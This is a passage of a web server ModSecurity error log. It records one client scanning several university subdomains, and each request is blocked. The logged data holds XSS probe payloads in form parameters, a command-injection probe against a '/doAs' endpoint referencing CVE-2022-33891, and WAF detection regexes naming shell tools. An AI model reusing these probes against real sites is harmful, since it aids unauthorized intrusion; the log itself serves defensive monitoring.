"OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/options.php"] [unique_id "ZO13MMCo-f0AAAdi9@0AAAAk"]
[Tue Aug 29 11:42:25.359885 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdrEmMAAAAn"]
[Tue Aug 29 11:42:25.375471 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAc-51AAAAAN"]
[Tue Aug 29 11:42:25.385478 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAbo-cUAAAAi"]
[Tue Aug 29 11:42:25.387263 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAc92xoAAAAD"]
[Tue Aug 29 11:42:25.409551 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:mailbox: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13McCo-f0AAAdV7bIAAAAa"]
[Tue Aug 29 11:42:26.375693 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdrEmYAAAAn"]
[Tue Aug 29 11:42:26.401519 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdeQ1cAAAAQ"]
[Tue Aug 29 11:42:26.420468 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAbo-cgAAAAi"]
[Tue Aug 29 11:42:26.427111 2023] [:error] [pid 1890] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdi9-EAAAAk"]
[Tue Aug 29 11:42:26.460236 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:where. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:where: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/search.php"] [unique_id "ZO13MsCo-f0AAAdZZrAAAAAf"]
[Tue Aug 29 11:42:27.360503 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdSZL0AAAAX"]
[Tue Aug 29 11:42:27.385545 2023] [:error] [pid 1876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdUc1oAAAAZ"]
[Tue Aug 29 11:42:27.400492 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdTBAIAAAAY"]
[Tue Aug 29 11:42:27.402861 2023] [:error] [pid 1881] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdZZrMAAAAf"]
[Tue Aug 29 11:42:27.404757 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAQSW0EAAAA0"]
[Tue Aug 29 11:42:27.423131 2023] [:error] [pid 1871] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdPLzcAAAAT"]
[Tue Aug 29 11:42:27.423479 2023] [:error] [pid 1899] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `echo found within ARGS:: `echo cve-2022-33891 | rev`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/doAs"] [unique_id "ZO13M8Co-f0AAAdrEmkAAAAn"]
[Tue Aug 29 11:42:27.425032 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAbo-c0AAAAi"]
[Tue Aug 29 11:42:27.437015 2023] [:error] [pid 1900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdsFhAAAAAo"]
[Tue Aug 29 11:42:27.445586 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:chapter. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:chapter: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/src/help.php"] [unique_id "ZO13M8Co-f0AAAdKXPMAAAAK"]
[Tue Aug 29 11:42:28.387675 2023] [:error] [pid 1910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:test-head. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:test-head: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/nextgen-gallery/nggallery.php"] [unique_id "ZO13NMCo-f0AAAd230AAAAAI"]
